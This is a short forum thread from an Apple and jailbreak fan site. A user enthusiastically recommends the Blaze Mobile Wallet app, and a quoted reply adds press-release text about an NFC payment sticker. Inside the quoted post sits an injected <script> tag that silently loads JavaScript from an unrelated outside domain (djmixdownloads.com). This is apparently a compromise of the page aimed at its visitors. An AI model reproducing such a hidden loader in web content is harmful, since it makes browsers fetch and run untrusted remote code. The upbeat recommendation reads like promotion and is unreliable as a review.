Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: Blaze Mobile Wallet

Default Blaze Mobile Wallet
    I just downloaded this app... I really like it... I think its pretty legit if you havent already downloaded it. You definitely should. Hella convenient and you can do hella on it. Its like a few apps in one... waaayyy easy!!!! and its kinda hot to be able to pay for things with your iphone instead of getting you card out and what not!

Quote Originally Posted by TechCrazzy View Post
    I just downloaded this app... I really like it... I think its pretty legit if you havent already downloaded it. You definitely should. Hella convenient and you can do hella on it. Its like a few apps in one... waaayyy easy!!!! and its kinda hot to be able to pay for things with your iphone instead of getting you card out and what not!<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    While phones with NFC technology built-in are coming to the market soon (with only one already available), Mobile Candy Dish has an NFC-based payment sticker for use with a current phone. This payment sticker comes as part of their private-label Blaze Debit MasterCard account available for free to subscribers. “With the Blaze Payment Sticker, consumers can make contactless purchases now without having to upgrade their mobile phone,” said CEO Michelle Fisher.